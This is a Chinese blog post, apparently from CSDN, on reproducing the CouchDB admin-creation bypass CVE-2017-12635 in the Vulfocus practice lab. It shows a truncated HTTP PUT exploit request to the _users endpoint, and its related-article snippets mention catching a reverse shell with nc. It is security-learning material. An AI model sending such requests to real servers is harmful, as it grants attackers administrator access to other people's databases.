vulfocus靶场couchdb 权限绕过 (CVE-2017-12635)

最新推荐文章于 2024-06-30 00:05:56 发布
最新推荐文章于 2024-06-30 00:05:56 发布
阅读量522 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_27249127/article/details/137919463
版权

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

下载postman 工具:https://postman.com/downloads

点击New 点击 HTTP

攻击代码:

PUT /_users/org.couchdb.user:Hacker1 HTTP/1.1
Host: 192.168.30.129:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92

{
  "type": "user",
最低0.47元/天 解锁文章
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 1082
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
渗透测试中新手必练的15个靶场
最新发布
Lucker_YYY的博客
10-02 1226
相信很多小伙伴们在学习渗透测试的时候,不知道如何开始,那么这下面15个靶场对你的学习将会有很大的帮助!SFeather::CTF明早8点开始,快来签到吧。赛点:ctf.54cto.com。
cve_2017_12635-CouchDB垂直权限绕过
c0529的博客
06-10 709
2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。使用大佬给的exp(exp在顶上的参考链接里面)影响版本:小于1.7.0以及小于2.1.1。直接拿到了flag,大佬真的太强了。打开vulfocus对应靶场
vulfocus复现:nginx-php-flag
m0_71518346的博客
12-18 357
命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。
Vulhub靶场Couchdb 任意命令执行漏洞复现
X_python321的博客
08-07 282
CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置`query_server`,这个配置项在设计、执行view的时候将被运行。
Couchdb 垂直权限绕过漏洞(CVE-2017-12635
一枚不知名的Java程序猿
10-02 1073
vulhub漏洞复现学习过程
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 441
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现
玄道的网安博客
05-06 3317
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
漏洞靶场搭建-Vulfocus
SuperherRo的博客
01-19 2883
Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2309
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
什么是未授权访问漏洞?Hadoop & Redis靶场实战——Vulfocus服务攻防
xt350488的博客
06-30 1267
Vulfocus是一个便捷的漏洞集成平台,用户只需加载漏洞环境的Docker镜像即可快速使用。它具备一键启动、自动更新flag、计分考核等特性,适用于安全测试和能力评估。平台兼容Vulhub和Vulapps的镜像,支持可视化配置,是安全人员的理想工具。在线位置:https://vulfocus.cn/#/dashboard离线版本:https://github.com/fofapro/vulfocus (即使没有网络也可以在本地进行渗透测试)Tips:docker 部署过程需要科学上网。
搭建vulfocus漏洞靶场
yzl_007的博客
09-22 4839
搭建vulfocus漏洞靶场 首先准备好了一台centos7系统的虚拟机 可以在这里下载http://mirrors.neusoft.edu.cn/centos/7/isos/x86_64/ 看自己需求下载 然后安装docker curl -fsSL https://get.docker.com | bash -s docker --mirror aliyun 启动docker systemctl start docker 拉取镜像 docker pull vulfocus/vulfocus:lat
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6345
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
【漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 2405
【showdoc-文件上传】API_page存在任意文件上传
[Vulfocus解题系列] CouchDB垂直越权漏洞(CVE-2017-12635
00勇士王子的博客
07-11 921
漏洞介绍 解题过程 1.打开题目环境 2.使用nc监听端口,用于接收漏洞环境的反弹Shell 3.
CouchDB垂直越权漏洞(CVE-2017-12635
小小猪的博客
12-27 823
CouchDB垂直越权漏洞(CVE-2017-12635) 框架介绍: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序) 环境搭建: 采用在线环境 地址 漏洞分析: 主要关注改包的过
Vulfocus安装过程
tlovejr的博客
03-01 4540
一、Vulfocus背景 漏洞靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似 dvwa、 sqli-labs 这类的开源项目,但是漏洞环境比较固定,使用完一次后就失去其作用。搭建的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于漏洞环境镜像使用多的是 vulhub,但是对于我们个人来说,要去构建一个新的漏洞环境确实麻烦,还有配置什么的,单纯的漏洞环境不一定能满足使用的需求,所以Vulfocus就基于当下的一些靶场项目做出了小小的改进来符合需求
Apache CouchDB信息泄露漏洞CVE-2023-26268深度解析及解决方案
"Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告,涉及Apache CouchDB 3.3.x和3.2.x版本,需要升级至安全版本或使用深信服解决方案进行资产检测和漏洞检测。" Apache CouchDB是一款开源的NoSQL文档数据库系统,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值